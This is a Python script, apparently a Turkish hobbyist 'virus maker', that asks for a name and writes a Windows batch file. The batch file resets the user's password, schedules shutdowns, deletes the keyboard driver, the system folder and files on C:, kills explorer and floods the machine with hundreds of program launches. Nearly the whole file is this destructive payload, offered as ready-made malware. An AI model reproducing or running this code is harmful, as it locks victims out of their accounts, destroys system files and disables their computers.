import os

add = input("Virus adını giriniz > ")
dosyz = open(add+".bat","a")
butun = (add+".bat")


dosyz.write('''@echo off
color a 
net user %username% 3.dunyasavasi 
shutdown -s -t 250
md maalesef
md virusu
md yedin
md uzgunum
md dostum
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
del C:/WINDOWS/system/KEYBOARD.DRV
start appwiz.cpl
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
md agab
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start tskill msnmsgr
start tskill explorer
md hala
md bilgisayarın
md gebermedi
md mi
md haha
md dostuuuum
start tskill msnmsgr
start tskill explorer
start tskill msnmsgr
start tskill explorer
start access.cpl
start accwiz.exe
net user %username% 3.dunyasavasi 
start desk.cpl
del C:/WINDOWS/system/
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
md maaleseff
md virusuu
md yedinn
md uzgunumm
md dostumm
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exestart calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
md maalese6f
md virusu6
md yedin6
md uzgunum6
md dostum6
md maalese5f
md virusu5
md yedin5
md uzgunum5
md dostum5
md maalesef4
md virusu4
md yedin4
md uzgunum4
md dostum4
md maalesef3
md virusu3
md yedin3
md uzgunum3
md dostum3
md maalesef2
md virusu2
md yedin2
md uzgunum2
md dostum2
md maalesef1
md virusu1
md yedin1
md uzgunum1
md dostum1
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
del C:/
color b
start calc
start
start
color b
shutdown
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
color a 
shutdown
color a 
shutdown
start
color a
shutdown 
start
color b
start calc
start
start
color b
shutdown
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
''')
